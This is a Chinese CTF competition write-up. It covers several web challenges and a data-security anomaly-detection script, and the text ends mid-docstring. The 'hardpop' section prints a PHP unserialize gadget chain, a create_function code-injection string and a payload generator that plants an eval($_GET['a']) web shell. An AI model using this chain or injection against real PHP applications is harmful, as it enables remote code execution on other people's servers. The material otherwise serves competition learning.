2025省赛决赛 WP
非常可惜,距离省一只差10分,300分的web刚结束就做出来了,以前时间不够的情况有很多但是第一次感觉这么遗憾,两个小登也尽力了,太久不打比赛自己还是太菜Tot
还有就是web题目质量依旧一大坨
web
输不进去
前端看到123456789,直接发包为123456789的payload
代码审计
考翻译,/audit,参数是query,绕过直接fenjing一把梭了,感觉出这题的人脑子不好
hardpop
create_function可以这样打
create_function('',"}phpinfo();?>");
然后正常走链子就行了,其实不是很难,链子很常规:destruct -> get -> tostring,然后是又臭又长的几个方法
<?php
// Silences every PHP diagnostic for the rest of the script, so warnings and
// notices raised while the object graph below is built or torn down are never shown.
error_reporting(0);
/**
 * Link in the unserialize() gadget chain: wT8mF4qN() hands its first argument
 * to the object stored in $mG6rL9fK. Nothing checks that property's type, so
 * after unserialize() it is whatever object the serialized data placed there
 * (the payload at the bottom of this file stores a nF9rV6sL).
 */
class pQ5mW8nL {
    public $mG6rL9fK;
    public $vX3cF6yR;
    public $hJ9kN2tM;
    public $lG7dS4vB;
    public $qF2mP8nR;
    public $tK5wL9cJ;
    public $nY4vG7pM;
    public $sR6fQ3mK;
    public $jL8cN2vP;
    public $gM5tR9qW;
    public $fH4pL6nY;
    public $uX7cG3rK;
    public $dV2mT8qL;
    public $wP9nF4vR;
    public $kQ6cL5mN;

    /**
     * Forward $command to $this->mG6rL9fK->zQ4mN8rL().
     *
     * @param mixed $command forwarded only when it is a non-empty string
     * @param mixed $output  unused
     * @return mixed the callee's return value, or false when $command is rejected
     */
    public function wT8mF4qN($command, $output) {
        echo "111111111";  // debug trace left in the source
        if (is_string($command) && strlen($command) > 0) {
            echo "111111111";
            return $this->mG6rL9fK->zQ4mN8rL($command);
        }
        return false;
    }

    /** Remove a declared property by name; unknown names are ignored. */
    public function __unset($name) {
        if (property_exists($this, $name)) {
            unset($this->$name);
        }
    }

    /** 'denied' when $input contains 'flag'; otherwise an md5 salted with time() (not reproducible). */
    public function mL7fQ2nK($input) {
        if (strpos($input, 'flag') !== false) {
            return 'denied';
        }
        return hash('md5', $input . 'secret_' . time());
    }
}
/**
 * Link in the unserialize() gadget chain: fM6nQ3rL() forwards both of its
 * arguments to the object in $kF9mR3qL (a pQ5mW8nL in the payload built at
 * the bottom of this file). The property is never type-checked.
 */
class bT4yH7uI {
    public $kF9mR3qL;
    public $kL9pN5xM;
    public $wS6vC3qJ;
    public $mR8fG2dN;
    public $zQ7nY4tK;
    public $pF3wL6mR;
    public $sH9cK4vN;
    public $jM2tQ8pL;
    public $gR5nF7wK;
    public $lV4cT9mQ;
    public $qN6pG3rY;
    public $uX8fM2vL;
    public $hK5wR7nP;
    public $dT3mL9qF;
    public $cP6vN4gR;

    /**
     * Print a debug marker and return $this->kF9mR3qL->wT8mF4qN($code, $data).
     *
     * @param mixed $code passed through unchanged
     * @param mixed $data passed through unchanged
     */
    public function fM6nQ3rL($code, $data) {
        echo "22222222222";  // debug trace left in the source
        return $this->kF9mR3qL->wT8mF4qN($code, $data);
    }

    /**
     * Sum 4*i for i = 1..$param1 when $param1 is numeric (0 otherwise),
     * then add (int)$param2. Not part of the chain.
     */
    public function rK8mT5nQ($param1, $param2 = null) {
        $result = 0;
        if (is_numeric($param1)) {
            for ($i = 1; $i <= $param1; $i++) {
                $result += $i * 4;
            }
        }
        return $result + (int)$param2;
    }

    /** Stamp $kL9pN5xM with a fresh uniqid() on clone. */
    public function __clone() {
        $this->kL9pN5xM = 'cloned_' . uniqid();
    }
}
/**
 * Link in the unserialize() gadget chain. mQ8fL3nR() ignores its own
 * parameters and instead forwards the two properties $aY5nU0gJ and
 * $vK1rE8pZ to the object in $hL4nQ9mP (a bT4yH7uI in the payload built at
 * the bottom of this file). oC4tF3aU::__destruct() is what overwrites those
 * two properties just before the chain starts.
 */
class xF9mQ2vL {
    // Default is the string that travels down the chain (mQ8fL3nR passes it on).
    public $aY5nU0gJ = "}eval(\$_GET['a']);?>";
    public $vK1rE8pZ = "1";
    public $hL4nQ9mP;
    public $sL6fG9rK;
    public $hJ3vN8mQ;
    public $cR5pT2wL;
    public $nK8dF4vY;
    public $qM6cL9rT;
    public $gP3nH7fM;
    public $jW5vK2qL;
    public $lT8mR4nP;
    public $fQ7cG3vK;
    public $uN9pL6mR;
    public $vY4fT8qN;
    public $rH2wG5pL;

    /**
     * When both $aY5nU0gJ and $vK1rE8pZ are truthy, return
     * $this->hL4nQ9mP->fM6nQ3rL($this->aY5nU0gJ, $this->vK1rE8pZ); else false.
     *
     * @param mixed $param1 unused
     * @param mixed $param2 unused
     */
    public function mQ8fL3nR($param1, $param2) {
        echo "3333333333";  // debug trace left in the source
        if ($this->aY5nU0gJ && $this->vK1rE8pZ) {
            return $this->hL4nQ9mP->fM6nQ3rL($this->aY5nU0gJ, $this->vK1rE8pZ);
        }
        return false;
    }

    /** Marker string with the current microtime(). */
    public function __invoke() {
        return 'xF9mQ2vL_invoked_' . microtime(true);
    }

    /** Only 'secret_value' resolves (to a fixed base64 string); everything else is null. */
    public function __get($name) {
        if ($name === 'secret_value') {
            return base64_encode('fake_secret');
        }
        return null;
    }

    /** Writes through __set are honoured only for the two chain properties; other names are dropped. */
    public function __set($name, $value) {
        if (in_array($name, array('aY5nU0gJ', 'vK1rE8pZ'))) {
            $this->$name = $value;
        }
    }
}
/**
 * Link in the unserialize() gadget chain: rN7mK4qL() calls mQ8fL3nR() on
 * the object in $wH4mK9pL (an xF9mQ2vL in the payload built at the bottom of
 * this file). fQ8mP3nL() is a second, independent code-evaluation sink that
 * the payload in this file does not wire up.
 */
class kY6rM3eL {
    public $wH4mK9pL;
    public $sT6vR3qN;
    public $jL8fY2mK;
    public $nM8xP5qW;
    public $tQ3vL6jK;
    public $rF7cN2mP;
    public $gP5nQ7wE;
    public $cM9vT4xR;
    public $lF3dG6pN;
    public $qY7mH5kJ;
    public $vN2rP8wL;
    public $fK6cT3mQ;
    public $hR9pL4vY;
    public $dG8nM6fT;
    public $uX2wQ5pR;

    /**
     * Call $this->wH4mK9pL->mQ8fL3nR($this->sT6vR3qN, $this->jL8fY2mK) for its
     * side effects and return the fixed string 'kY6rM3eL_method'. The string
     * return is what lets wJ4qV3jM::__toString() surface this call.
     */
    public function rN7mK4qL() {
        $this->wH4mK9pL->mQ8fL3nR($this->sT6vR3qN, $this->jL8fY2mK);
        return 'kY6rM3eL_method';
    }

    /**
     * Code-evaluation sink: both string arguments are concatenated into the
     * body of a create_function() closure and executed immediately.
     * create_function is deprecated since PHP 7.2 and removed in 8.0.
     *
     * @return mixed the closure's result, or false unless both arguments are strings
     */
    public function fQ8mP3nL($code, $callback) {
        if (is_string($code) && is_string($callback)) {
            $func = create_function('', $code . '; return ' . $callback . ';');
            return $func();
        }
        return false;
    }

    /** base64 of a JSON object holding time(), a random 5-digit number and sha1(uniqid()). */
    public function gT5nM9rK() {
        $data = json_encode(array(
            'timestamp' => time(),
            'random' => rand(10000, 99999),
            'hash' => sha1(uniqid())
        ));
        return base64_encode($data);
    }

    /** $nM8xP5qW when truthy, otherwise the fixed fallback 'kY6rM3eL_obj'. */
    public function __toString() {
        return $this->nM8xP5qW ?: 'kY6rM3eL_obj';
    }

    /** A write to the name 'tQ3vL6jK' is redirected into $rF7cN2mP; every other name is dropped. */
    public function __set($name, $value) {
        if ($name === 'tQ3vL6jK') {
            $this->rF7cN2mP = $value;
        }
    }
}
/**
 * Link in the unserialize() gadget chain, used twice by the payload at the
 * bottom of this file. __toString() reads the property name zX3aB7wQ from
 * $pL8vN4mR — that name differs by one character from the declared
 * $zX3cB7wQ, so when $pL8vN4mR is another wJ4qV3jM the read is undeclared
 * and resolves through __get(), which calls rN7mK4qL() on $rT6mQ3xK.
 */
class wJ4qV3jM {
    public $pL8vN4mR;
    public $zX3cB7wQ;
    public $fH9nY1dS;
    public $rT6mQ3xK;
    public $vL4nP9wE;
    public $jK7cF2gH;
    public $nY5vR8mL;
    public $dG6pT4qN;
    public $sM3wK9fR;
    public $hQ7nB5xJ;
    public $lF2vG6mP;
    public $tY8dQ4rK;
    public $cN9pL3vM;
    public $qW6fT7nR;
    public $uX5mH8pL;

    /**
     * Return $this->pL8vN4mR->zX3aB7wQ (note: not the declared zX3cB7wQ).
     * PHP requires __toString() to return a string; the value ultimately comes
     * from kY6rM3eL::rN7mK4qL(), which returns a fixed string.
     */
    public function __toString() {
        return $this->pL8vN4mR->zX3aB7wQ;
    }

    /** If $pL8vN4mR is a kY6rM3eL, hand $param and $zX3cB7wQ to its fQ8mP3nL() sink; otherwise returns null. */
    public function mK9fL2nQ($param) {
        if ($this->pL8vN4mR instanceof kY6rM3eL) {
            return $this->pL8vN4mR->fQ8mP3nL($param, $this->zX3cB7wQ);
        }
    }

    /** Concatenation of eight md5(rand()) digests. */
    public function pR6nF4mL() {
        $temp = array();
        for ($i = 0; $i < 8; $i++) {
            $temp[] = md5(rand());
        }
        return implode('', $temp);
    }

    /** Mark the instance as restored by unserialize(). */
    public function __wakeup() {
        $this->fH9nY1dS = 'wakeup_triggered';
    }

    /**
     * Undeclared-property reads: only 'zX3aB7wQ' resolves, and only when
     * $rT6mQ3xK is truthy, in which case it returns $rT6mQ3xK->rN7mK4qL().
     */
    public function __get($name) {
        if ($name === 'zX3aB7wQ' && $this->rT6mQ3xK) {
            return $this->rT6mQ3xK->rN7mK4qL();
        }
        return null;
    }
}
/**
 * Head of the unserialize() gadget chain. Its __destruct() runs automatically
 * when the object is released — including objects that unserialize() created
 * from request data — and echoes $hD6yV6eY, which for an object means
 * calling that object's __toString() (a wJ4qV3jM in the payload at the bottom
 * of this file).
 */
class oC4tF3aU {
    public $hD6yV6eY;
    public $aY5nU0gJ = 1;
    public $vK1rE8pZ = 1;
    public $iE7jU6pY;
    public $tY7eG5oV;
    public $mN8qR4xT;
    public $pL9wE5nK;
    public $fG3cV7yM;
    public $jH6dB2rQ;
    public $sT1vN9pL;
    public $kY4mF8xR;
    public $nW7cG5qJ;
    public $lP2vB6dM;
    public $qX9fR3tY;
    public $uE5nK7wL;

    /** var_dump() view: fixed status/level pair. */
    public function __debugInfo() {
        return array('status' => 'debugging', 'level' => 3);
    }

    /**
     * Copy $aY5nU0gJ and $vK1rE8pZ onto $hD6yV6eY, then echo it.
     * No type check on $hD6yV6eY: echoing an object invokes its __toString().
     */
    public function __destruct() {
        $this->hD6yV6eY->aY5nU0gJ = $this->aY5nU0gJ;
        $this->hD6yV6eY->vK1rE8pZ = $this->vK1rE8pZ;
        echo $this->hD6yV6eY;
    }

    /** Concatenation of ten md5(rand()) digests; $param is unused. */
    public function qW9rT2xK($param) {
        $temp = array();
        for ($i = 0; $i < 10; $i++) {
            $temp[] = md5(rand());
        }
        return implode('', $temp);
    }

    /** Mark the instance as restored by unserialize(). */
    public function __wakeup() {
        $this->fG3cV7yM = 'wakeup_called';
    }
}
/**
 * Holds a constructor-initialised marker array and a random 3-digit salt.
 * Not referenced by the payload built at the bottom of this file.
 */
class aP9wE5rA {
    public $mK7xL3vN;
    public $qJ6yU4nM;
    public $zC8fB2dG;
    public $hR5pW9tY;

    /** Seed $mK7xL3vN with a fixed marker array and $qJ6yU4nM with rand(100, 999). */
    public function __construct() {
        $this->mK7xL3vN = array('init' => true, 'type' => 'constructor');
        $this->qJ6yU4nM = rand(100, 999);
    }

    /**
     * Return sha256($input . $this->qJ6yU4nM).
     * For the literal 'secret_key_12345' it additionally reads /etc/passwd
     * and discards the content; the read has no effect on the return value.
     */
    public function sD3vN8mL($input) {
        if ($input === 'secret_key_12345') {
            file_get_contents('/etc/passwd');
        }
        $salted = $input . $this->qJ6yU4nM;
        return hash('sha256', $salted);
    }

    /** Print a fixed marker (the 'T' in the text does not match the class name). */
    public function __invoke() {
        echo "aP9wE5rT invoked";
    }

    /** Five random uppercase ASCII letters. */
    public function gF4mQ7xP() {
        $letters = '';
        for ($n = 0; $n < 5; $n++) {
            $letters .= chr(rand(65, 90));
        }
        return $letters;
    }
}
/**
 * Serialisation-aware container: __sleep() keeps only the two public
 * properties, so the private/protected ones never reach the serialized form.
 * Not referenced by the payload built at the bottom of this file.
 */
class xV2aM8qL {
    private $jK9rF5tW;
    protected $lP6sG4mN;
    public $cH3vB7yR;
    public $uQ8zX1dF;

    /** Restrict serialize() to the two public properties. */
    public function __sleep() {
        return array('cH3vB7yR', 'uQ8zX1dF');
    }

    /**
     * Map each key of an array to md5(key) => base64(serialize(value)).
     * Non-array input yields an empty array.
     */
    public function nY5tR8vM($data) {
        if (!is_array($data)) {
            return array();
        }
        $encoded = array();
        foreach ($data as $k => $v) {
            $encoded[md5($k)] = base64_encode(serialize($v));
        }
        return $encoded;
    }

    /** Only 'secret_property' resolves (to a fixed string); everything else is null. */
    public function __get($name) {
        return $name === 'secret_property' ? 'you_found_nothing' : null;
    }

    /** Stamp the hidden properties with time()/uniqid() and return time() + strlen(uniqid()). */
    public function qW3eR6tY() {
        $this->jK9rF5tW = time();
        $this->lP6sG4mN = uniqid();
        return $this->jK9rF5tW + strlen($this->lP6sG4mN);
    }
}
/**
 * Lookalike of bT4yH7uI (one letter differs) with a private internal_*
 * method reachable through __call. Not referenced by the payload built at
 * the bottom of this file.
 */
class bT4yO7uI {
    public $kL9pN5xM;
    public $wS6vC3qJ;
    public $mR8fG2dN;
    public $zQ7nY4tK;

    /** Report the three listed names as set, regardless of their values. */
    public function __isset($name) {
        $known = array('kL9pN5xM', 'wS6vC3qJ', 'mR8fG2dN');
        return in_array($name, $known);
    }

    /**
     * Sum 2*i for i = 1..$param1 when $param1 is numeric (0 otherwise),
     * then add (int)$param2.
     */
    public function eF6wQ9rT($param1, $param2 = null) {
        $total = 0;
        if (is_numeric($param1)) {
            for ($step = 1; $step <= $param1; $step++) {
                $total += 2 * $step;
            }
        }
        return $total + (int)$param2;
    }

    /** Route an undefined method call to internal_<name>() if that exists, else return false. */
    public function __call($method, $args) {
        $target = 'internal_' . $method;
        if (!method_exists($this, $target)) {
            return false;
        }
        return call_user_func_array(array($this, $target), $args);
    }

    /** rot13 over the base64 encoding of $data. */
    private function internal_process($data) {
        return str_rot13(base64_encode($data));
    }
}
/**
 * Lookalike of pQ5mW8nL with a subset of its properties. Not referenced by
 * the payload built at the bottom of this file.
 */
class pQ5mJ8nL {
    public $vX3cF6yR;
    public $hJ9kN2tM;
    public $lG7dS4vB;

    /** Unset $name only if it is currently set (non-null). */
    public function __unset($name) {
        if (!isset($this->$name)) {
            return;
        }
        unset($this->$name);
    }

    /** 'access_denied' when $input contains 'flag'; otherwise an md5 salted with time() (not reproducible). */
    public function rT8xP5qW($input) {
        if (strpos($input, 'flag') === false) {
            return hash('md5', $input . 'salt_' . time());
        }
        return 'access_denied';
    }

    /** JSON encoding of a fixed, hard-coded configuration array. */
    public function yU4nE7mK() {
        return json_encode(array(
            'version' => '1.0.0',
            'author' => 'unknown',
            'debug' => false,
            'encryption' => 'aes256'
        ));
    }
}
/**
 * Lookalike of nF9rV6sL that deep-clones $dK3mQ8xP on clone. Not referenced
 * by the payload built at the bottom of this file.
 */
class nF9vV6aL {
    public $dK3mQ8xP;
    public $tW7cN4yJ;
    public $jL5fG9rM;
    public $qB2vH6dS;

    /** Clone the nested $dK3mQ8xP as well (it must be an object) and stamp the clone time. */
    public function __clone() {
        $this->dK3mQ8xP = clone $this->dK3mQ8xP;
        $this->tW7cN4yJ = 'cloned_' . time();
    }

    /**
     * 'encrypt' -> base64 of $jL5fG9rM, 'decrypt' -> base64-decode of
     * $qB2vH6dS, anything else -> 'default_mode_active'. $mode is compared
     * loosely (==).
     */
    public function sM3nQ7wE($mode = 'default') {
        if ($mode == 'encrypt') {
            return base64_encode($this->jL5fG9rM);
        }
        if ($mode == 'decrypt') {
            return base64_decode($this->qB2vH6dS);
        }
        return 'default_mode_active';
    }

    /** Sum of i*i - i for i = 1..100 (333300), reduced modulo 12345. */
    public function xR8vN4mL() {
        $total = 0;
        for ($k = 1; $k <= 100; $k++) {
            $total += $k * ($k - 1);
        }
        return $total % 12345;
    }
}
/**
 * Property-gating class: __set reacts only to the pair ('secret', 'admin123')
 * and records a fixed marker in a private field. Not referenced by the
 * payload built at the bottom of this file.
 */
class gH4qV9nM {
    protected $lE6wR3xK;
    private $yT8fP5sJ;
    public $mQ7cN2vL;
    public $dF9kB4gR;

    /** Only ('secret', 'admin123') has an effect; every other write is dropped. */
    public function __set($name, $value) {
        if ($name !== 'secret' || $value !== 'admin123') {
            return;
        }
        $this->yT8fP5sJ = 'access_granted_fake';
    }

    /** Recurse until $depth exceeds 10, then return 'max_depth_reached'. */
    public function vK5nM8qW($depth = 0) {
        return $depth > 10 ? 'max_depth_reached' : $this->vK5nM8qW($depth + 1);
    }

    /** var_dump() view: class name plus fixed property counts. */
    public function __debugInfo() {
        $summary = array('class' => __CLASS__);
        $summary['public_properties'] = 2;
        $summary['private_properties'] = 1;
        $summary['protected_properties'] = 1;
        return $summary;
    }
}
/**
 * Stub helper: canned responses for file names and a 32-character token
 * drawn from rand(). Not referenced by the payload built at the bottom of
 * this file.
 */
class cL7mT4nR {
    public $wP8xQ5jK;
    public $sD6vL9fM;
    public $hN3yG2tB;

    /** Record the unserialize time in $wP8xQ5jK. */
    public function __wakeup() {
        $this->wP8xQ5jK = 'wakeup_' . date('Y-m-d H:i:s');
    }

    /** Never reads a file: '/flag.txt' yields 'permission_denied', any other name 'file_not_found'. */
    public function fR9mN6qL($filename) {
        return $filename === '/flag.txt' ? 'permission_denied' : 'file_not_found';
    }

    /**
     * Build a 32-character alphanumeric token. rand() is not a CSPRNG, so
     * the result is predictable and unsuitable for anything security-sensitive.
     */
    public function kY4tR7xM() {
        $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
        $last = strlen($alphabet) - 1;
        $token = '';
        for ($n = 0; $n < 32; $n++) {
            $token .= $alphabet[rand(0, $last)];
        }
        return $token;
    }
}
/**
 * Fake storage facade: nW6qR9tM() returns canned results and never touches
 * a database. Not referenced by the payload built at the bottom of this file.
 */
class uM2sF8vN {
    public $qJ5wE3rY;
    public $tK9nP6lG;
    public $xC4mH7dQ;
    public $vL8fR2jK;

    /** Class name plus this instance's spl_object_hash(). */
    public function __toString() {
        return 'uM2sF8vN_object_' . spl_object_hash($this);
    }

    /**
     * Canned responses keyed by $operation (loose == comparison): 'select'
     * echoes $data back inside a fixed record, 'insert'/'update' return fixed
     * success strings, anything else 'unknown_operation'.
     */
    public function nW6qR9tM($operation, $data) {
        if ($operation == 'select') {
            return array('id' => 1, 'name' => 'test', 'data' => $data);
        }
        if ($operation == 'insert') {
            return 'insert_success_fake';
        }
        if ($operation == 'update') {
            return 'update_success_fake';
        }
        return 'unknown_operation';
    }

    /** Password rule set: random length in 8..16 and two fixed flags. */
    public function gT3vN7mK() {
        $length = rand(8, 16);
        return array(
            'length' => $length,
            'complexity' => true,
            'special_chars' => false
        );
    }
}
/**
 * Nested-array builder with a serialize() whitelist. Not referenced by the
 * payload built at the bottom of this file.
 */
class jP4nQ8wL {
    public $fY7mK3xR;
    public $lV9cB5dN;
    public $hQ6tG2sM;

    /** Marker string with the current microtime(). */
    public function __invoke() {
        return 'jP4nQ8wL_invoked_' . microtime(true);
    }

    /**
     * Build array('level' => $level, 'next' => ...) recursively until $level
     * exceeds 5, where the chain ends in the string 'max_level_reached'.
     */
    public function mE5rT9vL($level = 1) {
        if ($level > 5) {
            return 'max_level_reached';
        }
        $node = array('level' => $level);
        $node['next'] = $this->mE5rT9vL($level + 1);
        return $node;
    }

    /** Only the first two properties survive serialize(). */
    public function __sleep() {
        return array('fY7mK3xR', 'lV9cB5dN');
    }
}
/**
 * Hashing helper whose digest is salted with time() and therefore not
 * reproducible. Not referenced by the payload built at the bottom of this file.
 */
class rK8xN4mQ {
    private $zA3vF6wR;
    protected $tL9nY5jM;
    public $pG7cB2dK;
    public $sH4mQ8xN;

    /** Only 'hidden_data' resolves (to a fixed base64 string); everything else is null. */
    public function __get($name) {
        return $name === 'hidden_data' ? base64_encode('secret_but_useless') : null;
    }

    /**
     * Digest of $pG7cB2dK . time(): md5 for 'md5', sha256 for 'sha256',
     * sha1 for any other $algorithm (loose == comparison).
     */
    public function vF3mT7qL($algorithm = 'sha1') {
        $material = $this->pG7cB2dK . time();
        if ($algorithm == 'md5') {
            return md5($material);
        }
        if ($algorithm == 'sha256') {
            return hash('sha256', $material);
        }
        return sha1($material);
    }

    /** Reports every declared property (including private/protected) as set, even when null. */
    public function __isset($name) {
        return property_exists($this, $name);
    }
}
/**
 * Final link of the unserialize() gadget chain. zQ4mN8rL() is the
 * code-evaluation sink: any string it receives becomes the body of a
 * create_function() closure, i.e. it is compiled as PHP source.
 * create_function is deprecated since PHP 7.2 and removed in 8.0.
 */
class nF9rV6sL {
    public $yR3fM8qL;
    public $tW7cN4yJ;
    public $jL5fG9rM;
    public $qB2vH6dS;
    public $mR8pL3nK;
    public $fT5wG9cQ;
    public $hY6mN2vL;
    public $sK4rP7fM;
    public $lQ9cT3wN;
    public $gF2mH8pL;
    public $vN6rK4qY;
    public $uP3fG7mR;
    public $cL5nT9wK;
    public $jM8vR2qP;
    public $dK6fL3mN;

    /**
     * Compile $cmd as the body of an anonymous function when it is a string.
     * The created closure is never invoked here and the return value is
     * always false; the compilation step itself is the sink.
     *
     * @param mixed $cmd untrusted when the object came from unserialize()
     * @return bool always false
     */
    public function zQ4mN8rL($cmd) {
        if (is_string($cmd)) {
            echo "success";  // debug trace left in the source
            $f1 = create_function('$a',$cmd);
        }
        return false;
    }

    /** Stamp $tW7cN4yJ with the clone time. */
    public function __clone() {
        $this->tW7cN4yJ = 'cloned_' . time();
    }

    /** 'encrypt' -> base64 of $jL5fG9rM, 'decrypt' -> base64-decode of $qB2vH6dS, else 'default_active'. */
    public function gH7mF2qL($mode = 'default') {
        switch ($mode) {
            case 'encrypt':
                return base64_encode($this->jL5fG9rM);
            case 'decrypt':
                return base64_decode($this->qB2vH6dS);
            default:
                return 'default_active';
        }
    }
}
/**
 * Config bag with a whitelisting constructor and a simulated query
 * sanitiser. Not referenced by the payload built at the bottom of this file.
 */
class yQ5vM9nL {
    public $kR8fG3tY;
    public $jW6nP4xM;
    public $lD7sC2vN;
    public $hF9mQ5kR;

    /** Copy only those keys of $config that name a declared property; other keys are dropped. */
    public function __construct($config = array()) {
        foreach ($config as $name => $value) {
            if (!property_exists($this, $name)) {
                continue;
            }
            $this->{$name} = $value;
        }
    }

    /**
     * Strip ';', '--' and the two C-style comment delimiters from $query and
     * echo it back together with $params. Simulation only: nothing is
     * executed, and blacklist stripping is no substitute for parameterised
     * queries.
     */
    public function nT4wQ8rM($query, $params = array()) {
        $blacklist = array(';', '--', '/*', '*/');
        $stripped = str_replace($blacklist, '', $query);
        return array(
            'query' => $stripped,
            'params' => $params,
            'status' => 'simulation_only'
        );
    }

    /** Random connection-tuning values. */
    public function xP6mL9vK() {
        return array(
            'timeout' => rand(30, 120),
            'retries' => rand(1, 5),
            'buffer_size' => rand(1024, 8192)
        );
    }
}
/**
 * Dynamic getter class: any call get_<prop>() reads that property through
 * __call. Not referenced by the payload built at the bottom of this file.
 */
class dW3mR7qN {
    public $tJ8fK5vL;
    public $pY4nG9xM;
    public $cQ6wR3sT;

    /**
     * get_<name>() returns $this->name when it is set, 'property_not_found'
     * otherwise; any other undefined method yields 'method_not_found'.
     */
    public function __call($method, $args) {
        if (substr($method, 0, 4) !== 'get_') {
            return 'method_not_found';
        }
        $prop = substr($method, 4);
        if (!isset($this->{$prop})) {
            return 'property_not_found';
        }
        return $this->{$prop};
    }

    /** Keep only ASCII letters and digits of a non-empty string; false for anything else. */
    public function vM5nQ8rL($input) {
        if (!is_string($input) || $input === '') {
            return false;
        }
        return preg_replace('/[^a-zA-Z0-9]/', '', $input);
    }

    /** Stamp $tJ8fK5vL with a fresh uniqid() on clone. */
    public function __clone() {
        $this->tJ8fK5vL = 'cloned_' . uniqid();
    }
}
/**
 * Case-folding helper with no-op lifecycle hooks. Not referenced by the
 * payload built at the bottom of this file.
 */
class fL9pM4nQ {
    public $wK6tR8vY;
    public $sJ3mN7fL;
    public $gD5xP2cM;
    public $hQ9vB4rK;

    /** Builds a log line when $wK6tR8vY is a string but never emits or stores it: effectively a no-op. */
    public function __destruct() {
        if (!isset($this->wK6tR8vY) || !is_string($this->wK6tR8vY)) {
            return;
        }
        $safe_log = 'Destruction of ' . __CLASS__ . ' at ' . date('Y-m-d H:i:s');
    }

    /** Upper-case a string, or every element of an array via array_map; other types pass through unchanged. */
    public function mT7nQ3wR($data) {
        if (is_string($data)) {
            return strtoupper($data);
        }
        if (is_array($data)) {
            return array_map('strtoupper', $data);
        }
        return $data;
    }

    /** Mark the instance as restored by unserialize(). */
    public function __wakeup() {
        $this->gD5xP2cM = 'object_awakened';
    }
}
/**
 * Busy-work counter plus a JSON dump of accessible state. Not referenced by
 * the payload built at the bottom of this file.
 */
class eV8nM2qL {
    public $rT5wF9kJ;
    public $lP3mG6vN;
    public $yH8cQ4xR;

    /**
     * Compute $count md5 digests (1000 for 'high', 100 otherwise) and return
     * how many were produced; the digests themselves are discarded.
     */
    public function nK7fR9mT($complexity = 'medium') {
        $count = 100;
        if ($complexity === 'high') {
            $count = 1000;
        }
        $digests = array();
        $n = 0;
        while ($n < $count) {
            $digests[] = md5($n . time());
            $n++;
        }
        return count($digests);
    }

    /** JSON object with the class name and all accessible object vars. */
    public function __toString() {
        $snapshot = array(
            'class' => __CLASS__,
            'properties' => get_object_vars($this)
        );
        return json_encode($snapshot);
    }
}
/**
 * Thin wrapper over gz/base64 transforms plus a whitelisting __set.
 * Not referenced by the payload built at the bottom of this file.
 */
class qM4vL8nR {
    public $xF6pK9tY;
    public $jW2cN5mL;
    public $dG7rQ3vM;
    public $hL9fT4xN;

    /**
     * Apply the transform named by $mode (loose == comparison) to $data:
     * compress/decompress via gzcompress/gzuncompress, encode/decode via
     * base64. Unknown modes return $data unchanged.
     */
    public function sP5nW8qM($mode, $data) {
        if ($mode == 'compress') {
            return gzcompress($data);
        }
        if ($mode == 'decompress') {
            return gzuncompress($data);
        }
        if ($mode == 'encode') {
            return base64_encode($data);
        }
        if ($mode == 'decode') {
            return base64_decode($data);
        }
        return $data;
    }

    /** Only the two listed names may be written through __set; other names are dropped. */
    public function __set($name, $value) {
        $writable = array('xF6pK9tY', 'jW2cN5mL');
        if (in_array($name, $writable)) {
            $this->$name = $value;
        }
    }
}
// Untrusted entry point: the POST field 'awa' is base64-decoded and passed
// straight to unserialize() with no allowed_classes restriction. Any class in
// this file can therefore be instantiated from request data, and the magic
// methods above (__wakeup, __destruct, __toString, __get, __set) run on
// objects whose properties the request controls.
if (isset($_POST['awa'])){
    unserialize(base64_decode($_POST['awa']));
}
// Payload generator (the solver's addition to the challenge source):
// instantiate the chain's classes and store each object in the property that
// the previous object's method dereferences, then write the serialized graph,
// base64-encoded, to the file "pay".
$oc4 = new oC4tF3aU();
$wJ4 = new wJ4qV3jM();
$wJ42 = new wJ4qV3jM();
$kY6 = new kY6rM3eL();
$xf9 = new xF9mQ2vL();
$bt4 = new bT4yH7uI();
$pq5 = new pQ5mW8nL();
$nf9 = new nF9rV6sL();
$pq5 -> mG6rL9fK = $nf9;
$bt4 -> kF9mR3qL = $pq5;
$xf9 -> hL4nQ9mP = $bt4;
$kY6 -> wH4mK9pL = $xf9;
$wJ42 -> rT6mQ3xK = $kY6;
$wJ4 -> pL8vN4mR = $wJ42;
$oc4 -> hD6yV6eY = $wJ4;
file_put_contents("pay",base64_encode(serialize($oc4)));

太可惜了以至于打完比赛还截了个图,主要是知识储备不够,create_function的洞是当场现挖的,单论链子真的不难。
数据安全
数据安全2
忘了题目叫什么了,脚本如下
import pandas as pd
from datetime import datetime, timedelta
import re
from collections import defaultdict
# -----------------------------
# 1. 商品类型与价格范围定义
# -----------------------------
# Product category -> (lower, upper) expected price. In this script only the
# keys are consulted: detect_amount_anomalies iterates them to decide which
# categories get per-category statistics; the bounds themselves are not used.
price_ranges: dict[str, tuple[int, int]] = {
    '电子产品': (100, 5000),
    '服装鞋包': (20, 1000),
    '家居用品': (50, 2000),
    '运动户外': (30, 1500),
    '图书音像': (10, 500),
    '美妆个护': (10, 1000),
    '食品饮料': (5, 500),
    '母婴用品': (20, 1000),
    '玩具乐器': (10, 1000),
    '汽车用品': (50, 3000),
}
# -----------------------------
# 2. Luhn算法校验
# -----------------------------
def luhn_check(card_number):
    """Return True if *card_number* (a string of ASCII digits) passes the Luhn check.

    Digits are processed right to left; every second digit, starting with the
    second from the right, is doubled and reduced by 9 when the product
    exceeds 9. Callers are expected to have verified ``isdigit()`` first;
    an empty string sums to 0 and therefore passes.
    """
    digits = [int(ch) for ch in reversed(card_number)]
    checksum = 0
    for position, value in enumerate(digits):
        if position % 2:
            value *= 2
            if value > 9:
                value -= 9
        checksum += value
    return checksum % 10 == 0
# -----------------------------
# 3. 数据预处理
# -----------------------------
def preprocess_data(df):
    """Coerce the columns the detectors rely on to their working dtypes, in place.

    '下单时间' becomes datetime64; the three numeric columns are parsed with
    ``errors='coerce'``, so unparsable cells become NaN instead of raising.
    The same DataFrame object is returned for chaining.
    """
    df['下单时间'] = pd.to_datetime(df['下单时间'])
    for column in ('用户注册天数', '用户历史订单数', '订单金额'):
        df[column] = pd.to_numeric(df[column], errors='coerce')
    return df
# -----------------------------
# 4. 异常检测函数
# -----------------------------
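def detect_amount_anomalies(df):
    """Return the set of user IDs with at least one order whose amount is an outlier.

    For every product type listed in ``price_ranges`` that occurs in *df*, the
    mean and sample standard deviation of '订单金额' are computed; an order is
    an outlier when it deviates from its type's mean by more than three
    standard deviations. Product types outside ``price_ranges`` are ignored.
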